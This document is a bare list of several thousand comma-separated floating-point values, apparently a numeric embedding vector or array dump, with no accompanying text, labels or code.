-0.03056904301047325, -0.013382833451032639, 0.000976982293650508, 0.02804397977888584, 0.008174891583621502, 0.024003880098462105, 0.03541400656104088, 0.008095983415842056, -0.007338464260101318, 0.025534698739647865, -0.0005013137706555426, -0.0000752710402593948, 0.018417177721858025, -0.023798717185854912, -0.0225677490234375, -0.007488389499485493, -0.0045964037999510765, 0.011299656704068184, -0.010045016184449196, -0.01413246151059866, 0.02753896825015545, 0.0057879178784787655, -0.02570829726755619, 0.03645559400320053, -0.0032293186523020267, 0.012025612406432629, -0.0035587605088949203, 0.0028959314804524183, -0.03370958939194679, -0.0011520599946379662, 0.012925165705382824, 0.02318323403596878, -0.02065817080438137, 0.014195588417351246, -0.00040835002437233925, -0.012017721310257912, -0.017422934994101524, -0.032383933663368225, -0.0051329792477190495, -0.011465364135801792, 0.014408640563488007, -0.004142681136727333, 0.007366082165390253, -0.02187335677444935, -0.023467304185032845, 0.009248042479157448, 0.017738567665219307, -0.0030951746739447117, 0.003085311269387603, 0.008908737450838089, 0.003491688519716263, 0.0059023345820605755, -0.011102385818958282, -0.035666514188051224, 0.004478041082620621, 0.004564840346574783, 0.02050035446882248, -0.02764943800866604, -0.003276663599535823, 0.026481596753001213, -0.00885350164026022, 0.013548540882766247, 0.00885350164026022, 0.014432312920689583, -0.019095787778496742, -0.01304352842271328, -0.000346456392435357, -0.01969549059867859, 0.02329370565712452, -0.01185990497469902, 0.00021835383085999638, -0.004193971864879131, -0.013240798376500607, -0.0027519240975379944, 0.004663475789129734, -0.013398614712059498, -0.00604436919093132, -0.0027972962707281113, -0.006648017093539238, -0.012001940049231052, 0.012641096487641335, -0.004414914641529322, -0.009303278289735317, -0.0015900005819275975, 0.016128839924931526, -0.018827499821782112, 0.018732810392975807, -0.010936678387224674, -0.01155216246843338, 0.0014745972584933043, 0.018985316157341003, -0.003876366186887026, 0.011481145396828651, -0.0009311169269494712, 0.035098373889923096, 0.011236529797315598, 0.002290311036631465, -0.01668119616806507, 0.0029018495697528124, -0.02417747676372528, 0.021336780861020088, -0.01153638120740652, 0.00033856555819511414, -0.0054801758378744125, -0.005097470711916685, -0.009784618392586708, -0.02073707990348339, -0.009311169385910034, 0.00620613107457757, 0.02409856952726841, -0.0027341695968061686, 0.01438496820628643, -0.006513873115181923, -0.0061074960976839066, 0.014258714392781258, 0.051542848348617554, 0.0021443308796733618, 0.0141166802495718, 0.013501196168363094, 0.011299656704068184, -0.0037994305603206158, -0.003377271583303809, -0.032305024564266205, -0.003598214592784643, 0.004272880032658577, 0.0154344467446208, -0.003971056081354618, 0.025850331410765648, 0.011252311989665031, 0.021557724103331566, -0.0030734750907868147, 0.0018651930149644613, 0.015860551968216896, -0.004746329039335251, 0.019442984834313393, -0.012869929894804955, -0.016073603183031082, 0.023924970999360085, 0.020516136661171913, -0.0038270484656095505, 0.020374100655317307, -0.00858521368354559, 0.0065927812829613686, 0.026150181889533997, -0.0015860551502555609, -0.01084198895841837, 0.0031661922112107277, -0.0034680161625146866, 0.002720360644161701, -0.0059023345820605755, 0.0028170233126729727, -0.0025467625819146633, 0.01563960872590542, -0.01641290821135044, 0.015245066955685616, -0.0009651461150497198, -0.007050449028611183, 0.007405536249279976, -0.02738115005195141, -0.004249207209795713, 0.00874303001910448, 0.01103925984352827, -0.0031977554317563772, -0.040495697408914566, -0.008285362273454666, 0.008364270441234112, 0.009532112628221512, -0.004040100611746311, 0.00991087220609188, -0.0069005233235657215, 0.011394346132874489, -0.025219066068530083, 0.0017557077808305621, 0.010076579637825489, -0.002063449937850237, -0.023246360942721367, 0.020531916990876198, -0.014621692709624767, -0.014637473970651627, 0.003061638679355383, -0.013248689472675323, -0.015860551968216896, -0.018369833007454872, -0.005866826046258211, -0.010218613781034946, 0.012349136173725128, -0.0007461758214049041, -0.010202832520008087, -0.012072957120835781, 0.008561541326344013, -0.015450228936970234, 0.001989473355934024, 0.017659658566117287, 0.011102385818958282, 0.019095787778496742, 0.015079360455274582, -0.005866826046258211, 0.025645170360803604, 0.0005069852923043072, -0.026907701045274734, -0.018354050815105438, -0.0032352369744330645, -0.0025428172666579485, 0.007275337353348732, -0.002162085147574544, 0.030884675681591034, -0.01057370100170374, -0.0028742316644638777, 0.014542784541845322, 0.00091089669149369, 0.015568590722978115, 0.010439557023346424, -0.0009518303559161723, -0.012325462885200977, 0.012364917434751987, -0.018764372915029526, 0.008135437034070492, -0.005914170760661364, -0.020405665040016174, -0.028438521549105644, -0.003953301813453436, -0.01636556349694729, 0.0054801758378744125, -0.0013818801380693913, -0.01080253440886736, 0.0037678673397749662, -0.002779542002826929, -0.01579742506146431, 0.006924196146428585, 0.0033496536780148745, 0.018543431535363197, 0.0067663793452084064, 0.0006835423992015421, -0.005736627150326967, -0.00791843980550766, 0.006608563009649515, 0.03885440528392792, 0.003756031161174178, -0.02375137247145176, -0.01246749795973301, 0.01363534014672041, -0.028391176834702492, 0.00496332673355937, -0.0015485737239941955, 0.014787400141358376, 0.014187697321176529, 0.024698272347450256, 0.015252958051860332, -0.0020200503058731556, -0.016160402446985245, 0.00969782005995512, 0.030663732439279556, -0.004375460557639599, 0.008877173997461796, 0.01074729859828949, 0.0086246682330966, 0.002388946246355772, -0.0064744190312922, 0.0006342247943393886, -0.008640449494123459, 0.00023203947057481855, 0.021510379388928413, 0.012317572720348835, -0.006190349347889423, 0.0022015392314642668, 0.02146303467452526, -0.017123082652688026, 0.015355538576841354, -0.010313304141163826, 0.00609171437099576, 0.00786320399492979, -0.008506305515766144, -0.003900038544088602, 0.0006209090352058411, -0.012862038798630238, -0.012577969580888748, -0.019869089126586914, -0.010360648855566978, 0.01591578684747219, -0.010613154619932175, 0.023593556135892868, 0.02020050399005413, -0.006825560703873634, 0.019190479069948196, -0.002842668443918228, -0.025045467540621758, -0.03752874583005905, -0.019001098349690437, 0.009934544563293457, -0.002998512238264084, 0.01002134382724762, -0.008135437034070492, 0.004616130609065294, 0.01245171669870615, 0.025077031925320625, 0.014558565802872181, -0.010029233992099762, -0.014124570414423943, 0.021778667345643044, 0.022962290793657303, -0.0059733521193265915, 0.010628936812281609, 0.01740715280175209, -0.0020614771638065577, -0.010329085402190685, -0.022362587973475456, -0.004375460557639599, -0.00912178959697485, -0.021589288488030434, 0.015000452287495136, 0.011370673775672913, -0.020673952996730804, 0.003718549618497491, -0.002779542002826929, -0.02646581642329693, 0.004466204904019833, 0.019490329548716545, -0.019600801169872284, 0.006782161071896553, -0.00803285650908947, -0.00006978445162530988, -0.008956082165241241, -0.0020654224790632725, 0.003894120454788208, -0.010865661315619946, -0.0232147965580225, 0.004010510165244341, 0.017044175416231155, -0.004927818197757006, 0.0016038095345720649, 0.0069084144197404385, -0.024145914241671562, -0.012980401515960693, 0.0051527065224945545, -0.020405665040016174, 0.03790750727057457, 0.011544272303581238, 0.002523090224713087, -0.0017665576888248324, 0.004793674219399691, 0.02984308823943138, 0.007942112162709236, -0.004564840346574783, 0.010668390430510044, -0.001439088606275618, 0.01598680391907692, -0.022315243259072304, -0.00728717353194952, 0.008774593472480774, 0.014708491042256355, 0.0056458828039467335, 0.0035469243302941322, 0.010692063719034195, -0.022709785029292107, -0.01077097188681364, -0.01331181637942791, -0.007835585623979568, -0.0010287659242749214, 0.006703252904117107, 0.01516615878790617, 0.029748396947979927, 0.0070228311233222485, 0.013935190625488758, -0.019364075735211372, -0.000032179756090044975, -0.004868636839091778, 0.00835638027638197, -0.0034601252991706133, 0.004770001862198114, -0.009760946035385132, 0.019064225256443024, -0.011780996806919575, -0.0023455466143786907, -0.013943081721663475, -0.010463229380548, 0.0005676459986716509, -0.0051527065224945545, 0.008916628547012806, -0.026670977473258972, 0.015079360455274582, -0.005689282435923815, -0.000931610120460391, 0.008577323518693447, 0.018417177721858025, -0.005101416260004044, 0.01625509187579155, -0.006644072011113167, -0.016507599502801895, 0.01813310757279396, -0.009705710224807262, 0.023120107129216194, 0.0071569751016795635, 0.004190026316791773, 0.005440721288323402, 0.009950325824320316, 0.006202185992151499, 0.0012250500731170177, -0.007768514100462198, 0.0013572212774306536, -0.0037047406658530235, -0.002649343339726329, 0.0126253142952919, 0.022930728271603584, -0.004399132914841175, -0.022220553830266, -0.01985330693423748, 0.0011333192232996225, -0.0049475450068712234, -0.0064744190312922, 0.0016629906604066491, 0.021889138966798782, -0.015608045272529125, -0.0025822713505476713, 0.00820645410567522, -0.007377918343991041, -0.02318323403596878, 0.007038612850010395, 0.00631265714764595, 0.023625120520591736, -0.025140156969428062, -0.00008051103941397741, -0.009255933575332165, 0.00468714814633131, 0.018227797001600266, 0.012136084027588367, -0.007370027247816324, 0.004134790506213903, 0.017643876373767853, -0.0007027763058431447, -0.00975305587053299, -0.002463909098878503, -0.000519807857926935, -0.019790180027484894, 0.0048962547443807125, 0.028438521549105644, -0.005058016628026962, -0.005563029088079929, 0.02165241539478302, 0.02960636280477047, 0.01208873838186264, -0.009137571789324284, 0.021242091432213783, -0.008695685304701328, 0.005259232595562935, 0.008380052633583546, 0.010202832520008087, 0.0001457336184103042, -0.011504817754030228, 0.010991914197802544, -0.000008152821465046145, 0.006139059085398912, -0.017533404752612114, -0.00636789295822382, -0.012806803919374943, 0.00256254430860281, -0.00636000232771039, -0.017659658566117287, -0.006075932644307613, 0.008482633158564568, -0.01107082236558199, -0.023861844092607498, -0.007847421802580357, 0.020989585667848587, -0.0013404532801359892, 0.0055314661003649235, 0.012522733770310879, -0.006068042013794184, -0.025077031925320625, 0.0025132265873253345, 0.0034305346198379993, 0.006217967253178358, -0.010226504877209663, 0.025676732882857323, 0.01191514078527689, -0.0008028910961002111, -0.00366725935600698, -0.008806156925857067, -0.00691235950216651, 0.019569236785173416, 0.006861069239675999, 0.007184593006968498, -0.0055945925414562225, -0.010029233992099762, -0.004174244590103626, 0.011023477651178837, -0.009034990333020687, 0.008900846354663372, -0.015158268623054028, -0.0012585860677063465, -0.006616454105824232, 0.0137931564822793, 0.018606556579470634, 0.026560505852103233, -0.00566166453063488, 0.0017162536969408393, 0.0021029040217399597, -0.016381345689296722, -0.00964258424937725, -0.010187050327658653, -0.002878177212551236, 0.005559084005653858, 0.003836912102997303, 0.020374100655317307, -0.011465364135801792, 0.019616583362221718, -0.010707844980061054, 0.00512508861720562, 0.003442371031269431, -0.036897480487823486, 0.011670525185763836, 0.012278118170797825, 0.012009830214083195, -0.005839208140969276, -0.010265958495438099, -0.005361813120543957, 0.010123924352228642, 0.004071664065122604, 0.01705995574593544, -0.015442337840795517, -0.0007062285440042615, -0.0011431827442720532, 0.004233425948768854, -0.01775434799492359, 0.023435739800333977, 0.01901688054203987, 0.023088544607162476, 0.010415884666144848, -0.021257873624563217, 0.006004915107041597, 0.02646581642329693, 0.006340275052934885, -0.029101349413394928, 0.006008860655128956, 0.014676928520202637, 0.016665415838360786, 0.0016442500054836273, 0.005981242749840021, -0.008719357661902905, -0.0003738276718650013, 0.025960803031921387, 0.021257873624563217, 0.018290923908352852, -0.00761069729924202, -0.013280252926051617, 0.02103693038225174, 0.0061587863601744175, -0.025771424174308777, 0.00998188927769661, -0.016397127881646156, 0.005314468406140804, 0.0302218459546566, 0.008451069705188274, 0.016002586111426353, 0.030048249289393425, -0.007729059550911188, 0.003318090457469225, 0.005705064162611961, 0.009689928963780403, -0.019064225256443024, -0.009721492417156696, -0.009879308752715588, 0.009034990333020687, -0.0027696783654391766, -0.003544951556250453, -0.040685076266527176, 0.0000034406755275995238, -0.0021048765629529953, -0.023498866707086563, -0.03097936511039734, 0.008971864357590675, 0.017927946522831917, -0.0076067522168159485, 0.005073798354715109, -0.0034778795670717955, 0.008971864357590675, -0.019190479069948196, 0.00040982954669743776, 0.014014098793268204, 0.005148760974407196, 0.006399456411600113, 0.0182435791939497, -0.02023206651210785, -0.009397968649864197, -0.003584405640140176, 0.0019579101353883743, -0.014377077110111713, -0.000488491146825254, 0.02111583948135376, 0.0030537480488419533, 0.010455338284373283, -0.00304585718549788, -0.019805962219834328, 0.010857770219445229, 0.024272168055176735, 0.013737920671701431, 0.0016590452287346125, 0.010534246452152729, 0.004446478094905615, 0.0017714895075187087, 0.0014588156482204795, -0.008664121851325035, -0.004193971864879131, 0.014803181402385235, -0.021557724103331566, 0.028217578306794167, 0.013730029575526714, -0.004915982019156218, -0.014700600877404213, 0.0019105651881545782, -0.005894443951547146, -0.0038171850610524416, -0.01705995574593544, -0.04614552482962608, -0.015126705169677734, 0.010336976498365402, -0.008987645618617535, -0.01698104850947857, -0.004714766051620245, 0.018117327243089676, -0.00404404615983367, -0.0036830410826951265, -0.029196040704846382, 0.025724077597260475, 0.004537222441285849, 0.021668195724487305, -0.008127545937895775, 0.0275863129645586, 0.009248042479157448, 0.012270228005945683, -0.020595043897628784, 0.0063244933262467384, 0.006861069239675999, -0.02130521833896637, 0.00858521368354559, 0.02031097561120987, 0.028738372027873993, -0.01671276055276394, 0.004091390874236822, -0.01843295991420746, 0.0011865822598338127, -0.0047621107660233974, 0.006517818663269281, -0.01977439969778061, -0.005129034165292978, 0.02697082795202732, 0.005109306890517473, 0.002834777580574155, 0.015537028200924397, -0.009768837131559849, 0.006194294895976782, -0.010984024032950401, -0.012877820990979671, 0.008608886040747166, 0.02670253999531269, -0.02925916574895382, -0.005215832963585854, -0.0017241445602849126, 0.008750921115279198, 0.00020096935622859746, -0.016318218782544136, -0.00240078242495656, -0.020263629034161568, -0.019379857927560806, 0.010794644244015217, -0.00043522813939489424, 0.00831692572683096, -0.005464394111186266, 0.008506305515766144, 0.0038605844601988792, 0.010265958495438099, -0.010968241840600967, -0.0025783260352909565, -0.01705995574593544, 0.015308193862438202, -0.009508440271019936, 0.008458960801362991, 0.0019184560514986515, -0.010794644244015217, -0.019379857927560806, 0.002870286349207163, 0.0014223206089809537, 0.007089903112500906, -0.018101545050740242, -0.0038211303763091564, -0.0132723618298769, -0.0040184007957577705, 0.0017793802544474602, -0.008269581012427807, -0.01652337983250618, 0.0036475323140621185, -0.020279411226511, -0.011599508114159107, -0.013011964969336987, 0.007082012481987476, 0.033488646149635315, 0.004328115843236446, -0.015860551968216896, 0.002785460092127323, -0.009784618392586708, 0.005227669142186642, 0.016034148633480072, 0.004142681136727333, -0.008750921115279198, 0.01767544075846672, 0.003836912102997303, 0.0020890950690954924, 0.007638315204530954, -0.006446801126003265, 0.011828341521322727, 0.020374100655317307, 0.007902657613158226, -0.012925165705382824, 0.01614462025463581, -0.00033486675238236785, 0.03497212007641792, 0.007141193374991417, -0.007575188763439655, -0.013075090944766998, 0.01893797144293785, -0.015821097418665886, -0.0010721654398366809, 0.016570724546909332, -0.012033502571284771, -0.003836912102997303, 0.01821201667189598, 0.011623180471360683, -0.0027124700136482716, 0.012333353981375694, -0.029274947941303253, -0.0032017009798437357, 0.0019569238647818565, -0.0071569751016795635, 0.014432312920689583, 0.016160402446985245, -0.014353404752910137, 0.02804397977888584, 0.007985511794686317, 0.004304443020373583, 0.013264470733702183, 0.007930275984108448, 0.009508440271019936, 0.010550028644502163, 0.0027617875020951033, 0.0031464651692658663, 0.00207923143170774, -0.0027815145440399647, -0.016397127881646156, 0.007839531637728214, -0.0025033631827682257, 0.007082012481987476, 0.006300820969045162, -0.016460254788398743, 0.031168745830655098, 0.00021847712923772633, -0.008190672844648361, 0.008135437034070492, -0.005298686679452658, -0.003134628990665078, 0.025566261261701584, -0.016807449981570244, -0.002511254046112299, -0.042484182864427567, -0.006549382116645575, 0.00021897029364481568, 0.0025487353559583426, -0.011717869900166988, -0.008285362273454666, -0.019569236785173416, -0.012917274609208107, -0.0036495050881057978, 0.001290149288251996, -0.02413013204932213, -0.003986837808042765, -0.010976132936775684, 0.004038128070533276, -0.01848030462861061, 0.008632558397948742, -0.009177025407552719, 0.002039777347818017, 0.04298919439315796, -0.014850526116788387, -0.000005332469299901277, 0.015103032812476158, -0.012846257537603378, 0.014534893445670605, 0.0052039967849850655, 0.0036869863979518414, 0.0005770163261331618, 0.015844769775867462, -0.008387943729758263, -0.013146108947694302, 0.005819480866193771, -0.006632235366851091, 0.00442675082013011, -0.003347681136801839, -0.017154647037386894, 0.0005997024709358811, -0.010739408433437347, -0.0008265635697171092, -0.000012506644452514593, 0.01128387451171875, -0.004002619069069624, -0.02160506881773472, 0.022315243259072304, -0.011938813142478466, 0.019364075735211372, -0.014740054495632648, -0.0015446282923221588, -0.02420904114842415, 0.0070425583980977535, 0.009745164774358273, -0.00948476791381836, -0.001481501734815538, -0.03030075505375862, -0.0002924535656347871, 0.006490200757980347, -0.005949679296463728, 0.006249530706554651, -0.004813401028513908, -0.012956729158759117, -0.0033792443573474884, 0.012317572720348835, 0.006502036936581135, 0.01625509187579155, 0.028833061456680298, -0.011449581943452358, -0.005527520552277565, -0.009303278289735317, -0.0070583401247859, -0.016010476276278496, 0.0022922835778445005, -0.01878015510737896, -0.009453204460442066, -0.009942435659468174, -0.010589482262730598, -0.005026453174650669, -0.022851819172501564, -0.002406700514256954, -0.001409498043358326, -0.016933703795075417, 0.0010741380974650383, 0.000174707718542777, -0.0038665025494992733, 0.01598680391907692, -0.0132723618298769, 0.00781980436295271, 0.006884742062538862, 0.004030236974358559, -0.0012526679784059525, 0.0031188472639769316, -0.018922191113233566, -0.008656231686472893, 0.0034502616617828608, 0.008364270441234112, 0.014818962663412094, -0.0005459462408907712, -0.0378759428858757, 0.015095141716301441, -0.009666256606578827, 0.024619363248348236, -0.006174568086862564, 0.0043399520218372345, -0.0016787722706794739, 0.00885350164026022, 0.011465364135801792, -0.007752732373774052, 0.025771424174308777, -0.004115063697099686, 0.028201796114444733, -0.0261975284665823, -0.00820645410567522, -0.003231291426345706, 0.013769484125077724, 0.026386907324194908, 0.0067150890827178955, 0.04346264526247978, 0.0008196590933948755, -0.026134401559829712, 0.009579457342624664, -0.018275143578648567, 0.003231291426345706, 0.025376882404088974, -0.0018069981597363949, -0.01797529123723507, 0.0027755964547395706, 0.02600814774632454, -0.015118814073503017, 0.01219921000301838, 0.0030261301435530186, -0.013840501196682453, -0.004679257050156593, 0.0005257260054349899, -0.004430696368217468, -0.006131168454885483, -0.009855636395514011, -0.0037007953505963087, 0.0011175376130267978, -0.0028742316644638777, 0.0006973513518460095, -0.03156328573822975, 0.002552680904045701, 0.0017103356076404452, 0.009011317975819111, -0.014850526116788387, 0.012475389055907726, -0.0027302242815494537, 0.0020614771638065577, 0.018417177721858025, -0.008017074316740036, -0.010810425505042076, -0.01740715280175209, 0.024572018533945084, -0.01832248829305172, -0.004915982019156218, 0.027207553386688232, 0.010076579637825489, 0.01649181731045246, -0.021794449537992477, 0.002935385564342141, 0.00971360132098198, 0.0028564773965626955, 0.011560053564608097, 0.00609960500150919, -0.005436776205897331, -0.005105361808091402, 0.013027746230363846, -0.011331220157444477, -0.015008342452347279, 0.0141166802495718, 0.0013039582408964634, -0.0037678673397749662, 0.0022587475832551718, 0.001681731315329671, -0.0008305090013891459, 0.021936483681201935, 0.01748606003820896, -0.013911518268287182, 0.006667744368314743, 0.007875040173530579, -0.002935385564342141, 0.0017783938674256206, 0.011173403821885586, -0.007377918343991041, 0.007385808974504471, 0.009824072942137718, -0.012641096487641335, -0.011930922046303749, 0.016270874068140984, 0.02493499591946602, -0.0182435791939497, 0.025834549218416214, -0.02375137247145176, 0.0022350752260535955, -0.02547157183289528, 0.01155216246843338, 0.001992432400584221, -0.009350623935461044, -0.026450034230947495, -0.00512508861720562, 0.00008907997835194692, 0.0302218459546566, -0.004399132914841175, -0.005515684373676777, 0.0069005233235657215, -0.01223866455256939, 0.009618911892175674, -0.014913653023540974, 0.03154750540852547, 0.00003899175499100238, 0.0015160241164267063, -0.00032746908254921436, 0.005417048931121826, -0.004367569927126169, 0.004470150452107191, -0.025266410782933235, 0.008253799751400948, 0.012562188319861889, 0.02318323403596878, 0.012917274609208107, 0.017912164330482483, -0.018638120964169502, -0.01901688054203987, 0.0024737725034356117, -0.014187697321176529, 0.014266605488955975, 0.013887845911085606, 0.0033042815048247576, -0.000342017796356231, 0.004343897104263306, 0.0026355343870818615, -0.018922191113233566, 0.006648017093539238, 0.0039611924439668655, 0.003114901715889573, -0.017959509044885635, -0.00921647995710373, 0.010968241840600967, 0.016120947897434235, 0.0038349393289536238, 0.030348099768161774, 0.02799663506448269, -0.01859077624976635, 0.02689192071557045, -0.007295064628124237, 0.018290923908352852, 0.012933056801557541, -0.007681714836508036, 0.010834097862243652, -0.0037441947497427464, -0.014108789153397083, 0.02160506881773472, 0.005870771128684282, -0.013161890208721161, 0.012617424130439758, 0.007851367816329002, 0.002953140065073967, 0.019790180027484894, 0.008640449494123459, -0.005436776205897331, -0.0017635986441746354, -0.009248042479157448, -0.05103783309459686, 0.011252311989665031, -0.0049475450068712234, -0.002087122295051813, -0.008553650230169296, -0.016854794695973396, 0.019348295405507088, -0.00820645410567522, 0.012759458273649216, -0.010660500265657902, 0.01705995574593544, -0.012854148633778095, 0.003619914408773184, -0.002824914176017046, -0.01028963178396225, 0.005144815891981125, 0.0018533567199483514, 0.0075988611206412315, 0.01797529123723507, 0.006644072011113167, -0.013493305072188377, -0.01472427323460579, -0.023419957607984543, 0.0021601123735308647, -0.00029787851963192225, -0.006892632693052292, 0.009326951578259468, -0.00992665346711874, -0.020168939605355263, -0.008174891583621502, -0.013264470733702183, 0.006640126463025808, 0.010092360898852348, -0.0008403725223615766, 0.010486901737749577, 0.0010613155318424106, -0.012585860677063465, 0.004485932178795338, -0.01137856487184763, 0.01099980529397726, -0.004679257050156593, 0.011938813142478466, -0.022220553830266, 0.007271392270922661, 0.010052906349301338, -0.018275143578648567, -0.001854343106970191, -0.00025817780988290906, -0.015316084958612919, -0.013019856065511703, 0.013240798376500607, -0.006616454105824232, 0.012727894820272923, -0.01982174441218376, 0.004000646527856588, 0.017201991751790047, -0.010131814517080784, -0.022962290793657303, -0.016917921602725983, 0.01103925984352827, -0.000522766902577132, -0.0010189022868871689, -0.007701442111283541, -0.019300948828458786, 0.0026414524763822556, 0.010542137548327446, 0.005835262592881918, 0.026071274653077126, -0.00426498893648386, 0.0005272055277600884, 0.0015446282923221588, -0.0027933509554713964, 0.023435739800333977, -0.002162085147574544, -0.002818996086716652, -0.0052237240597605705, -0.0008531950879842043, 0.006399456411600113, 0.002657234203070402, 0.003103065537288785, 0.009437422268092632, 0.020184721797704697, -0.01958501897752285, 0.000806343334261328, 0.0026118620298802853, -0.0021936483681201935, -0.0002742060460150242, 0.006083823274821043, 0.004324170295149088, 0.014250824227929115, 0.019300948828458786, 0.022899163886904716, -0.0075357346795499325, 0.0005188215291127563, 0.0019253605278208852, -0.019727053120732307, -0.02318323403596878, 0.015505464747548103, -0.014558565802872181, 0.004841018933802843, -0.0035488971043378115, -0.02727068029344082, 0.0037224951665848494, -0.007425263058394194, 0.012443825602531433, -0.00550779327750206, -0.009855636395514011, -0.02394075319170952, 0.009721492417156696, 0.0033575445413589478, 0.013225017115473747, 0.013477522879838943, 0.022630875930190086, 0.002457991009578109, -0.0166022889316082, -0.022694002836942673, 0.01590789668262005, 0.006608563009649515, -0.014519112184643745, -0.0054801758378744125, -0.0031050383113324642, 0.0002075039519695565, -0.0016324137104675174, 0.011086604557931423, -0.011899358592927456, -0.010873552411794662, -0.02455623634159565, -0.018717028200626373, -0.03913847357034683, 0.004284716211259365, 0.019348295405507088, 0.024603581055998802, 0.013398614712059498, 0.020058467984199524, 0.01055791974067688, -0.0016028231475502253, 0.01690213941037655, -0.006068042013794184, 0.0011816505575552583, -0.025266410782933235, 0.0015574508579447865, -0.01484263502061367, 0.027523186057806015, 0.007385808974504471, 0.007456826511770487, -0.019679708406329155, -0.011149730533361435, 0.015394993126392365, 0.006569108925759792, 0.021068492904305458, -0.004055882338434458, -0.017912164330482483, -0.012420153245329857, -0.0015821097185835242, -0.016618071123957634, 0.02253618650138378, 0.017265116795897484, 0.022883383557200432, -0.000013847467016603332, -0.009689928963780403, -0.02038988284766674, 0.01101558655500412, -0.009090226143598557, 0.02984308823943138, 0.006194294895976782, 0.0034857704304158688, 0.0031070110853761435, -0.008021020330488682, -0.010621045716106892, 0.006892632693052292, 0.010076579637825489, 0.019947996363043785, -0.022930728271603584, 0.0065927812829613686, -0.0018474386306479573, 0.007247719448059797, -0.026418469846248627, -0.03983286768198013, 0.010534246452152729, -0.011118168011307716, 0.002919604070484638, 0.011173403821885586, 0.005144815891981125, -0.006143004633486271, -0.0031878920271992683, -0.0012102547334507108, -0.0035725694615393877, 0.007981565780937672, -0.012633205391466618, 0.02777569182217121, -0.0025783260352909565, 0.032068297266960144, -0.005977297201752663, -0.004126899875700474, 0.01663385145366192, 0.006450746674090624, 0.020358320325613022, -0.0006115386495366693, 0.002613834571093321, -0.0077172233723104, -0.010676281526684761, 0.02149459719657898, -0.003144492395222187, -0.009902981109917164, -0.00991087220609188, -0.011157621629536152, -0.0014696655562147498, -0.013958862982690334, -0.0009010331705212593, 0.023151671513915062, 0.008036801591515541, 0.0022587475832551718, 0.004091390874236822, -0.014795290306210518, 0.0077921864576637745, -0.003978946711868048, -0.012885712087154388, 0.014826853759586811, -0.001484460779465735, 0.03386740759015083, 0.03113718144595623, 0.014085116796195507, 0.023435739800333977, 0.005890498403459787, -0.0054801758378744125, -0.028517428785562515, 0.008900846354663372, 0.0043833511881530285, 0.0013749756617471576, 0.023735592141747475, 0.004115063697099686, 0.00679005216807127, 0.019080007448792458, 0.013011964969336987, 0.008151218295097351, -0.007523898500949144, 0.005211887881159782, -0.03408835083246231, -0.005570920184254646, -0.005641937255859375, 0.02704973705112934, 0.0044543687254190445, -0.01160739827901125, -0.01149692665785551, -0.006399456411600113, 0.003282581688836217, 0.03342552110552788, 0.01352486852556467, -0.02122630923986435, -0.022772911936044693, 0.01073151733726263, 0.006146950181573629, -0.03478274121880531, 0.022772911936044693, -0.01025017723441124, 0.014850526116788387, 0.0010504656238481402, 0.006214022170752287, 0.011631070636212826, 0.019458765164017677, 0.004182135220617056, -0.002349492162466049, 0.037623438984155655, 0.017849039286375046, -0.002022023079916835, -0.013493305072188377, -0.003939492627978325, -0.006849233061075211, 0.004939654376357794, 0.0044740960001945496, -0.001400620792992413, -0.02689192071557045, -0.02791772596538067, -0.013509086333215237, -0.02600814774632454, 0.007839531637728214, 0.006513873115181923, -0.01610516756772995, -0.0004904638626612723, -0.005890498403459787, -0.0035528424195945263, -0.014195588417351246, -0.013611666858196259, 0.010636827908456326, -0.006241640076041222, 0.014432312920689583, -0.029180258512496948, -0.014455985277891159, 0.005488066468387842, 0.007074121385812759, -0.009934544563293457, -0.024998122826218605, 0.011110276915133, -0.02237837016582489, -0.031184526160359383, 0.00749628059566021, -0.014811072498559952, 0.009050772525370121, -0.010376430116593838, -0.013603776693344116, 0.0009395009255968034, 0.01051846519112587, -0.0013443987118080258, 0.009895090013742447, 0.010068688541650772, -0.02146303467452526, 0.022551968693733215, -0.007168811280280352, -0.003905956633388996, -0.006793997250497341, -0.00539337657392025, 0.005026453174650669, -0.009737273678183556, -0.00631265714764595, 0.00749628059566021, 0.00820645410567522, -0.010155487805604935, -0.005602483171969652, 0.008466851897537708, -0.016057822853326797, 0.015481792390346527, 0.005192160606384277, 0.002927494700998068, -0.0033812171313911676, 0.008719357661902905, 0.0034443435724824667, 0.035287752747535706, -0.019679708406329155, 0.00380534864962101, 0.01241226214915514, -0.002128549152985215, -0.007492335047572851, -0.015134596265852451, 0.002290311036631465, -0.001388784614391625, 0.0020614771638065577, 0.014298168942332268, -0.016807449981570244, -0.022867601364850998, -0.00921647995710373, 0.01025017723441124, 0.002643425250425935, -0.00824590865522623, -0.008348489180207253, 0.015181940980255604, -0.012341245077550411, 0.001481501734815538, -0.00458062207326293, 0.011986157856881618, 0.019711272791028023, -0.003308227052912116, 0.01939564011991024, -0.014732164330780506, 0.020279411226511, 0.009034990333020687, -0.031847357749938965, -0.0001533778413431719, -0.0031977554317563772, -0.01133911032229662, -0.008766702376306057, -0.01775434799492359, -0.012901493348181248, 0.0036041326820850372, -0.036708101630210876, 0.005598538089543581, -0.005144815891981125, 0.012428044341504574, 0.01743871532380581, 0.0031287106685340405, -0.002341601299121976, 0.0010741380974650383, -0.00998188927769661, 0.0006307725561782718, 0.006423128768801689, -0.0025447900407016277, -0.00921647995710373, 0.006482310127466917, -0.009184916503727436, 0.006320548243820667, 0.00035459379432722926, 0.05832895264029503, -0.0010070661082863808, 0.0023751372937113047, -0.0038566391449421644, 0.0008231113315559924, 0.002785460092127323, -0.00045890058390796185, -0.010321194306015968, -0.01775434799492359, -0.0017517623491585255, -0.01840139552950859, -0.004809455946087837, 0.01082620769739151, -0.020216284319758415, 0.0022646659053862095, 0.010400102473795414, 0.004627966787666082, -0.002550708130002022, -0.023009635508060455, -0.0001300752628594637, -0.010463229380548, -0.016507599502801895, 0.014945216476917267, -0.002888040617108345, 0.0013079036725685, 0.005282904952764511, -0.01851186715066433, 0.0065296548418700695, 0.0006648017442785203, -0.020342538133263588, 0.031231872737407684, 0.005476230289787054, -0.0015357511583715677, 0.007373972795903683, -0.0040756091475486755, 0.01805420033633709, -0.023419957607984543, 0.023356832563877106, -0.010455338284373283, -0.026576288044452667, 0.015860551968216896, 0.0060956599190831184, 0.0022804473992437124, -0.008640449494123459, 0.02168397791683674, -0.004399132914841175, -0.005263178143650293, -0.007393700070679188, -0.005854989401996136, -0.02509281225502491, -0.012767349369823933, 0.013548540882766247, -0.00550779327750206, -0.0013039582408964634, 0.018953753635287285, -0.022046955302357674, 0.004182135220617056, -0.00588260730728507, -0.01499256119132042, -0.008269581012427807, -0.0006485268822871149, -0.008971864357590675, 0.0009454190731048584, 0.008103873580694199, -0.006975486408919096, 0.012364917434751987, 0.02949589118361473, 0.010707844980061054, -0.008877173997461796, -0.0019293058430776, -0.003864529775455594, 